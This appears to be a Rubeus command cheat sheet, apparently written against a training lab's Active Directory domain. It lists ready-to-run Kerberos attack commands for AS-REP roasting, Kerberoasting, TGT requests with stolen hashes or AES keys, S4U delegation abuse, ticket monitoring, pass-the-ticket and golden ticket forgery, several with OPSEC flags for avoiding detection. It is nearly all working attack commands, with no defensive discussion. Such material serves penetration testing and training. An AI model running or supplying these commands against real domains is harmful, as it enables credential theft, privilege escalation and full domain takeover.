Rubeus
Description
Rubeus is a C# tool for Kerberos attacks including AS-REP Roasting, Kerberoasting, ticket requests, S4U delegation abuse, golden ticket creation, and ticket monitoring. Always try to run Rubeus.exe on cmd.exe not on powershell.exe without InviShell.
Usage 1: AS-REP Roasting
Command:
.\Rubeus.exe asreproast /usr:johnny /outfile:hashes.txt
Usage 2: Kerberoasting
Command:
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:hashes.txt
Command (List Kerberoast stats):
Rubeus.exe kerberoast /stats
Command (RC4 OPSEC safe):
Rubeus.exe kerberoast /stats /rc4opsec
Command (All Kerberoastable users):
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Usage 3: Request TGT with NTLM Hash
Command:
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt
Usage 4: Request TGT with AES256 (OPSEC Safe)
Command:
Rubeus.exe asktgt /user:administrator /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Usage 5: S4U Constrained Delegation Abuse
Command:
Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt
Usage 6: Monitor for TGT Tickets (Unconstrained Delegation)
Command:
Rubeus.exe monitor /interval:5 /targetuser:dcorp-dc$ /nowrap
Usage 7: Pass the Ticket
Command:
Rubeus.exe ptt /ticket:<TICKET>
Usage 8: Golden Ticket
Command:
C:\AD\Tools\Rubeus.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:2453 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC
Usage 9: Convert Password to Hash
Command:
Rubeus.exe hash /password:7aU5yb0Rr6CzB71Z2Aij8